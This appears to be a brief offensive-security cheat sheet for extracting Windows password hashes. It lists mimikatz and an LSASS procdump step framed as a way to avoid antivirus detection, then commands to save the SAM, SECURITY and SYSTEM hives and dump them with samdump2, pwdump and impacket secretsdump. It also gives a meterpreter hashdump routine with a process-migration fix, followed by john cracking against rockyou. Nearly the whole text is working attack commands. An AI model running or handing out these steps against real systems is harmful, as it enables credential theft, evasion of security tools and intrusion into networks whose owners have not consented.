hashes

mimikatz to extract creds from memory

Use windows procdump on LSASS and analyze offline to avoid AV detection

// save a copy of SAM DB
reg save hklm\sam sam.save
reg save hklm\security security.save
reg save hklm\system system.save

samdump 2 system.save sam.save
pwdump system.save sam.save
python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam.save -system system.save LOCAL

meterpreter
hashdump
john myhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT-old


Trying to hashdump will initially FAIL
//  priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
migrate to another process ID and then hashdump (which should work)
migrate 1556
hashdump

// grab the hashes to crack offline